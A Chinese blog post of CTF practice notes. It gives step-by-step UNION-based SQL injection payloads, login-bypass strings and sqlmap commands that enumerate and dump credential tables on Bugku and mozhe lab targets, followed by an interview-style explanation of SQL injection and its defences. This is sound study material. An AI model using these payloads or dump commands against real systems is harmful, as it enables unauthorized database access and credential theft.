2021-08-13

最新推荐文章于 2024-05-23 20:06:02 发布
最新推荐文章于 2024-05-23 20:06:02 发布
阅读量228 收藏
点赞数 3
分类专栏: day2 文章标签: sql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51170293/article/details/119667075
版权

菜鸡写着玩玩DAY2 概要
1 ctf
2 面试题

bugku 成绩查询

随便输 123啥的
在这里插入图片描述

获取列数,因为上面已经输出名字和3科分数,所以就猜4和5
id=1’ order by 4#

在这里插入图片描述
id=1’ order by 5# 不显示结果 说明查询结果中有4列

在这里插入图片描述
知道了是4列 故用联合查询 得到库名
id=s’ union select 1,2,3, database()#
在这里插入图片描述
知道了库名是skctf 下一步 求表名
id=a’ union select 1,1,1,concat(table_name) from information_schema.tables where table_schema=‘skctf’#
#information_schema.tables 用于查询表的信息
#table_schema=‘skcf_flag’ 指定要查询的表名 ps表名记着加引号
在这里插入图片描述
知道了表名 求列名
id=a’ union select 1,2,3,concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘fl4g’# ps column 别拼错
在这里插入图片描述
数据库名 database table_schema=‘skctf’
表名 table_name fl4g
列名 skctf_flag
则求该列名下的项 可以得到flag

*id=a’ union select 1,2,3,(select skctf_flag from fl4g)# select里套select要用括号
id=a’ union select 1,2,3,(select from fl4g)# 因为表fl4g中只有一列一条数据,所以也可以直接不用列名,直接查表也可以。
在这里插入图片描述
用sqlmap
用burp抓包 从post数据包中注入
在这里插入图片描述

python sqlmap.py -r “C:\Users\sakuraty\Desktop\111.txt” -p “id” --dbs
在这里插入图片描述
在这里插入图片描述
找到数据库,information_schema是默认数据库,所以查看skctf_flag库,猜数据库中的表

Python sqlmap.py -r "C:\Users\lenovo\Desktop\111.txt" -p id -D skctf --tables
在这里插入图片描述
ps注意把库名写对

获得表中列的值

python sqlmap.py -r "C:\Users\lenovo\Desktop\111.txt" -p “id” --columns -T fl4g -D skctf

在这里插入图片描述

======================================
php的万能密码 admin’ or ‘1’='1
在这里插入图片描述
在这里插入图片描述

BUUCTF

题目地址:https://buuoj.cn/challenges#wireshark在这里插入图片描述
在这里插入图片描述
flag{ffb7567a1d4f4abdffdb54e022f8facd}

wireshark分析 https://huanghelouzi.blog.csdn.net/article/details/88628590?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-1.baidujsUnder6&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-1.baidujsUnder6

题目 https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
用sqlmap注意大小写
得到库名

/sqlmap -u http://219.153.49.228:42816/new_list.php?id=1 -D mozhe_Discuz_Stormgroup --tables

available databases [5]:
[] information_schema
[] mozhe_Discuz_StormGroup
[] mysql
[] performance_schema
[*] sys
得到表名

/sqlmap -u http://219.153.49.228:42816/new_list.php?id=1 -D mozhe_Discuz_Stormgroup --tables

mozhe_Discuz_StormGroup
[2 tables]
±------------------+
| StormGroup_member |
| notice |
由表获得列

sqlmap -u http://219.153.49.228:42816/new_list.php?id=1  --columns -T StormGroup_member -D mozhe_Discuz_StormGroup

| Column | Type |
±---------±-------------+
| id | int(11) |
| name | varchar(20) |
| password | varchar(255) |
| status | int(11) |
脱库

sqlmap -u http://219.153.49.228:42816/new_list.php?id=1 -D mozhe_Discuz_StormGroup -T  StormGroup_member -C name,password --dump

高频面试问答题:SQL注入
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
1.可以注入成功的前提:
(1).代码混合在数据中,使得恶意代码获得执行
(2).用户可以输入,且输入的语句被构造成SQL语句并获得执行。
2.各种注入串的效果:
首先明确and 和 or的优先级:and的优先级要比较高
尝试一下各种字符串的登录效果:
a’#——能登陆,用户a
’ or 1#——能登陆,用户a
alice’ #——能登陆,用户alice
a’ and ‘1 ——不能登录
a’ or ‘1 —— 能登陆,用户a
b’ or ‘1 ——能登陆,用户b
a’ or 1# ——能登陆,用户a
b’ or 1 # ——能登陆,但注意用户是a
盲注 ——没有直接的返回的数据,但是通过查询的表现,譬如延时来窃取信息的方法。
利用and和时间函数(sleep())相连接。
例如:执行时运用的语句为:XXXX and sleep(10);——若数据库中存在XXX名字,则执行后面的休息;若数据库中没有XXX的名字,则后面也不会执行。
防御
(一)SQL注入本质是利用数据注入代码,
所以防御就要求区分数据和代码——过滤和转义
1.过滤特殊符号
开启:magic_quote_gpc
选上之后,PHP代码就可以在用户输入的时候对用户的输入进行处理,把所有的特殊符号如’、“等都加上\进行转义
2.利用prepare_statement
Prepare_statement的作用是规定好需要的参数的类型,同时对用户的输入进行鉴别和处理;保证用户的输入不可能作为代码被执行。
指明了数据类型,将数据和代码分离,将用户输入全部转换成字符串形式
在这里插入图片描述

白鹿0820
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
2021-08-13 独立进程的进度条.zip
08-13
Delphi 进度条窗口,不影响主线程
SQL注入了解认识及注入方式
小羊的博客
09-08 3150
一、什么是SQL注入(SQL Injection) Sql注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析执行。如果攻击者能够修改SQL语句,那么该语句将与应用的用户拥有相同的运行权限。当使用SQL服务器与系统执行交互命令时,该进程将与执行命令组件拥有相同的权限。 二、SQL注入原理 由于网站开发人员或者程序编写人员在处理应用程序和数据库交互的时候,没有正确使用安全编码导致用户提交的数据(...
2021-08-13mybatis-plus的page方法
weixin_45933454的博客
08-31 1万+
mybatis-plus功能强大,同时带有分页功能。 再controller层直接调用 page()方法即可 。 page()方法有俩个参数 ,一个是page ,一个是 queryWrapper 后者可以给他设置一些条件,属于非必要参数。 page 参数是必要的 。 这个page类 是 java8 之后的,是由mybatis-plus自带的, 它的包如下 ```java import com.baomidou.mybatisplus.extension.plugins.pagination.Pag
2021-08-13 WPF控件专题 Border控件详解
热门推荐
微软MVP Eleven
08-13 4万+
1.Border控件介绍 边框 围绕在其他元素周围 或 背景色 BorderBrush 边框颜色 BorderThickness 粗细 CornerRadius 圆角的弧度 Background border内部背景色 应用:布局面板一起使用 作为任意控件的边框显示 Border 只能有一个元素作为它的子元素 2.具体案例 <Grid> <Border BorderBrush="Red" BorderThickness="1" CornerRadius="1.
2021-04-21
qq_56102648的博客
04-21 728
2021-05-05
樊金良的博客
05-05 630
你需要努力,fighting!
2021-06-08
luquanyou的博客
11-09 2万+
Copyright © 2017-2020, googlehosts members. https://github.com/googlehosts/hosts Last updated: 2020-02-19 This work is licensed under a modified HOSTS License. https://github.com/googlehosts/hosts/raw/master/LICENSE Modified Hosts Start Localhost (DO NOT R
2021-01-15
hikarilee的博客
01-15 1180
git clone 操作出现 fatal:index-pack failed 此错误为当前克隆文件夹属性只读,将只读取消
github报fatal: Authentication failed解决方案(2021-08-13日之后)
jack_zj123的博客
08-30 7107
问题 在2021年8月13日后对github进行push或pull过程都出现了 fatal: Authentication failed 解决方案:创建令牌代替原始密码 原因 https://github.blog/2020-12-15-token-authentication-requirements-for-git-operations/ 创建步骤 https://docs.github.com/cn/github/authenticating-to-github/keeping-your-acco
2021-08-24T02:29:01.282Z 日期格式转换为:2021-08-24 10:29:01
qq_37148353的博客
08-24 1191
const timeDate = 2021-08-24T02:29:01.282Z function rTime(timeDate) { var json_date = new Date(timeDate).toJSON(); return new Date(+new Date(json_date) + 8 * 3600 * 1000).toISOString().replace(/T/g, ' ').replace(/\.[\d]{3}Z/, '') }
生命学科校级平台入楼申报表、车辆入校申请表新的表单-VkzZ-表单反馈导出_2021-08-13.zip
08-13
生命学科校级平台入楼申报表、车辆入校申请表新的表单-VkzZ-表单反馈导出_2021-08-13.zip
专题资料(2021-2022年)QHSE-01-13-08-机动车辆交通安全管理细则-20101209.doc
10-07
专题资料
思迅软件基本档案导入工具(2021-08-02)
08-03
思迅软件基本档案导入工具旨在简化其他软件切换思迅软件时基本档案导入流程,提高数据转化效率,避免垃圾数据,确保数据准确性。集商品品类导入、供应商档案导入、品牌信息导入、商品资料导入、会员信息导入、客户...
海山数据库(He3DB)代理ProxySQL使用详解:(一)架构说明与安装
weixin_42744640的博客
05-23 657
后端的MySQL实例可根据用途配置到不同的hostgroup中,由ProxySQL基于7层网络协议,将来源于APP的流量路由到对应的hostgroup内,从而实现负载均衡或者读写分离。通常用于黑名单功能,即如果匹配该规则后,如果其error_msg不为空,则客户端的操作将会接受到error_msg设置的错误信息;transaction_persistent:表示是否持久化事务,设置为1表示开启一个事务后,该事务的所有操作均在同一个hostgroup中操作完成,其会忽略设置的任何查询规则;
【Text2SQL 经典模型】TypeSQL
最新发布
VLyb
05-23 1015
借助于数据库的 table schema 检索和 knowledge graph 的检索,为 question 的每个 word 标注一个 type,从而提高 embedding 的效果当 database content 可用时,type 标注时还会进一步对 column content 做检索,并为其标注 column name,这样当用户的 question 中的所提到的列名或者条目不精确时,也可以通过这个步骤来对应到具体的数据库 column,从而提高效果,实现所谓的“内容敏感性。
OceanBase SQL 诊断和调优实践——【DBA从入门到实践】第七期
OceanBase分布式数据库的博客
05-20 1137
《DBA 从入门到实践》第七期在5月22日(周三)如期而至,为大家讲解:ODP(OceanBase Database Proxy) SQL 路由原理;如何分析 SQL 监控视图;如何阅读和管理 OceanBase SQL 执行计划;最常见的 SQL 调优方式;SQL 性能问题的典型场景和排查思路。
【Hive SQL 每日一题】分析电商平台的用户行为和订单数据
JIE的博客 --- moon_coder
05-23 933
假设你是一位数据分析师,负责分析某电商平台的用户行为和订单数据,平台上有多个用户,用户可以在不同的日期下单,每个订单包含多个商品。请你完成相关业务分析,帮助平台优化运营策略和用户体验。排序并取出平均每月订单金额和订单数量最高的两个用户。统计每个用户每月的平均订单金额和订单数量;记录订单中商品的信息。
ValueError: time data "['2021-08-13 08:20:54.000000']" does not match format '%Y-%m-%d %H:%M:%S.%f'
05-19
在这个例子中,时间字符串 "['2021-08-13 08:20:54.000000']" 带有方括号和单引号,这不是一个有效的时间格式。 你需要先将方括号和单引号去掉,然后再将时间字符串转换为 datetime 类型。可以使用以下代码: ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值